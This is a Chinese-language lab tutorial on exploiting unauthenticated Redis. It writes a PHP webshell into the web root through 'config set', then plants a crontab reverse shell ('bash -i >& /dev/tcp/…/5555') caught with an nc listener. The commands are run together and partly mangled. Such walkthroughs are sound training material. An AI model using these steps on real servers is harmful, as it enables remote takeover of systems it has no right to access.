常见的未授权访问漏洞:
- redis 未授权访问漏洞
- MongoDB 未授权访问漏洞
- Jenkins 未授权访问漏洞
- Memcached 未授权访问漏洞
- JBOSS 未授权访问漏洞
- VNC 未授权访问漏洞
- Docker 未授权访问漏洞
- ZooKeeper 未授权访问漏洞
- Rsync 未授权访问漏洞
- Atlassian Crowd 未授权访问漏洞
- CouchDB 未授权访问漏洞
- Elasticsearch 未授权访问漏洞
- Hadoop 未授权访问漏洞
- Jupyter Notebook 未授权访问漏洞
漏洞利用环境介绍
目标靶机: centos7ip地址: 192.168.18.138连接工具:Xshell
环境搭建wget http://download.redis.io/releases/redis-2.8.17.tar.gz
文章插图
tar xzvf redis-2.8.17.tar.gz#解压安装包cd redis-2.8.17# 进入redis目录make #编译
文章插图
cd src/ #进入src目录 cp redis-server /usr/bin/ cp redis-cli /usr/bin/#将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)cd ..# 返回上一级目录cp redis.conf /etc/#将redis.conf拷贝到/etc/目录下redis-server /etc/redis.conf# 使用/etc/目录下的redis.conf文件中的配置启动redis服务
【黑客最喜欢的常见未授权访问漏洞系】服务启动成功!文章插图
服务启动成功为了方便,在windows攻击机里下载一个redis clinet下载地址:https://github.com/caoxinyu/RedisClient/releases (利用redis写webshell测试使用)
文章插图
下载地址:https://github.com/dmajkic/redis/downloads (利用crontab反弹shell测试使用)
文章插图
未授权访问测试使用redis clinet 直接无账号成功登录redis
文章插图
从登录结果可以看出redis未启用认证 。
文章插图
利用redis写webshell
利用前提:靶机redis未授权,在攻击机能用redis clinet连接,如上图,并未登录验证靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限
靶机网站路径:/var/www/html/这里我们调出Console文章插图
由于本地搭建,我们已经知道网站路径,我们把shell写入/var/www/html/目录下:
config set dir /var/www/htmlconfig set dbfilename test.phpconfig set webshell "<?php phpinfo(); ?>"save
文章插图
文章插图
文章插图
文章插图
访问test.php
文章插图
利用crontab反弹shell端口监听:在攻击机上监听一个端口(未被占用的任意端口):
nc -lvnp 5555
文章插图
连接redis,写入反弹shell
redis-cli.exe -h 192.168.18.138config set dir /var/spool/cronset -.- "nnn* * * * * bash -i >& /dev/tcp/192.168.15.3/5555 0>&1nnn"config set dbfilename rootsave
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 喝白沙绿茶有什么功效,夏天喝什么茶叶最好
- 柿子怎么催熟最快?
- 中国十大名茶最新排名是怎样的?
- 世界上最敏捷的动物 世界上最活泼的动物
- 金瓜贡茶怎么泡最好喝,狗脑贡茶怎么泡
- 世界上最大的耳朵屎 世界上最大的耳朵的人图片
- 大猩猩体重最重有多少斤 猩猩最大的有多少斤
- 老人冬天心血管疾病高发 该如何预防
- 冬季男性隐忧大 专家:冬季灭男科疾病最高效
- 寒性体质喝什么茶最好,紫罗兰花茶什么人不能喝